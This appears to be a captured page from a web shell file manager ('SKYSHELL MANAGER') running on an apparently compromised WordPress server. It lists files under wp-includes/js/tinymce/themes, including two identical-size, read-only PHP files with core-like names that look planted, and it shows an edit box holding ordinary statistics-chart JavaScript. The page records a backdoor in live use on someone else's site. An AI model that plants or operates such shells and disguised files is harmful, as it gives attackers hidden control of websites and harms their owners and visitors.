📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: post.js
wps_js.post_meta_box = { params: function () { return {'ID': wps_js.global['page']['ID']}; }, view: function (args = []) { return (args.hasOwnProperty('content') ? '<div class="wps-center" style="padding: 15px;"> ' + args['content'] + '</div>' : '<canvas id="' + wps_js.chart_id('post') + '" height="85"></canvas>'); }, meta_box_init: function (args = []) { if (!args.hasOwnProperty('content')) { this.post_hits_chart(wps_js.chart_id('post'), args); } else { jQuery("#" + wps_js.getMetaBoxKey('post') + " button[onclick]").remove(); } }, post_hits_chart: function (tag_id, args = []) { wps_js.line_chart(tag_id, args['title'], args['date'], [{ label: args['post_title'], data: args['state'], backgroundColor: 'rgba(255, 99, 132, 0.2)', borderColor: 'rgba(255, 99, 132, 1)', borderWidth: 1, fill: true }]); } };
Save